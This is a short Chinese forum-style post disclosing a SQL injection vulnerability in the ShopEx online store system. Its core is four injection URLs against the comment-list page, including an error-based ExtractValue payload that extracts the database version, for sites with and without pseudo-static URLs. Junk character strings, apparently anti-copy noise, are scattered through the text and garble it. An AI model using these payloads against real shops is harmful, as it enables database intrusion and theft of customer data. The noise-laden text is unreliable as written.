注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… " r. q* q1 @& V
# x, k5 l6 F/ j# c- o" w
好吧,我扯远了~~5 r6 G5 H) o8 |3 N' x' Q# [
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~8 s5 ^8 R1 D- [
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
x/ r! u1 q3 L5 _5 I
, j3 M& J5 }, j6 n3 p: a! a1 fhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
0 k3 e; Q' J9 L1 }6 ]( Q! Q6 I; L) n& V ?
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 2 F2 @) z8 l. `
3 \1 `" x' B; U' d5 }7 ]! D
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
/ @. ?% R1 r: f% v* ~+ ~. Q4 F! ^5 \# C% v M7 w/ z* s; S; Q
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html / L5 F: v& C- |1 W [4 w! P% p
9 U9 n3 d8 v. R; ~+ I: ?& G 1 ]+ A& i( [& Q8 M- B, H- V
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
# O' h% w2 x7 W! U+ a如何注入就不多说了,10多年的东西了…不会也会了… 4 P6 q) I6 L7 v
7 J; w3 [2 p& V) ~$ M: [. ^+ a3 {9 M* f V8 o0 Y
2 r* |0 q! _& |% n7 a' ~% D- j
8 X% W8 K- k5 A |